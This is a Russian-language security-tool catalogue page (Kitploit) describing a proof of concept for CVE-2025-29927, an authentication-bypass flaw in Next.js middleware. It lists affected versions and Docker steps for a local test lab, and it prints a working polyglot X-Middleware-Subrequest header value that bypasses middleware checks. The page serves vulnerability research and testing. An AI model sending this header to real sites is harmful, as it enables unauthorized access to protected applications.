Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-29927-PoC — PoC для CVE-2025-29927: уязвимость обхода middleware в Next.js. Демонстрирует, как x-middleware-subrequest может обходить проверки аутентификации. Включает настройку Docker для тестирования. | Kitploit
Инструменты/GitHubGitHub/alihussainzada/cve-2025-29927-poc
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubalihussainzada/cve-2025-29927-poc

CVE-2025-29927-PoC

PoC для CVE-2025-29927: уязвимость обхода middleware в Next.js. Демонстрирует, как x-middleware-subrequest может обходить проверки аутентификации. Включает настройку Docker для тестирования.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
5131 год назадЕщё не проверено

CVE-2025-29927: PoC обхода промежуточного ПО Next.js

Этот репозиторий демонстрирует уязвимость CVE-2025-29927 в Next.js, где внутренний заголовок x-middleware-subrequest может использоваться для обхода проверок промежуточного ПО, таких как аутентификация.

Затронутые версии

  • Next.js 15.x < 15.2.3
  • Next.js 14.x < 14.2.25
  • Next.js 13.x < 13.5.9

Шаги для воспроизведения

1. Клонируйте репозиторий:

root@kitploit:~
git clone https://github.com/alihussainzada/CVE-2025-29927-PoC.git

2. Перейдите в папку проекта:

root@kitploit:~
cd CVE-2025-29927-PoC

3. Сгенерируйте секрет:

root@kitploit:~
openssl rand -base64 32

4. Обновите секрет в файле .env:

root@kitploit:~
NEXTAUTH_SECRET=your_generated_secret

5. Соберите и запустите с помощью Docker:

root@kitploit:~
docker build -t nextjs .
docker run -p 3000:3000 --env-file .env nextjs

Доказательство концепции

Мы можем значительно упростить эксплуатацию этой проблемы, используя полиглот, который позволяет эффективно охватывать различные возможные случаи. Нам удалось добиться этого с помощью следующего HTTP-заголовка, используемого для проверки наличия обхода аутентификации:

root@kitploit:~
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware

Перенаправление пользователей

Пример эксплуатации

Авторы/Источники

  • Блог Next.js о CVE-2025-29927
  • Исследование Zhero Web Security: Next.js и повреждённое промежуточное ПО
  • Исследование Assetnote Security: анализ обхода промежуточного ПО Next.js
Скачать инструмент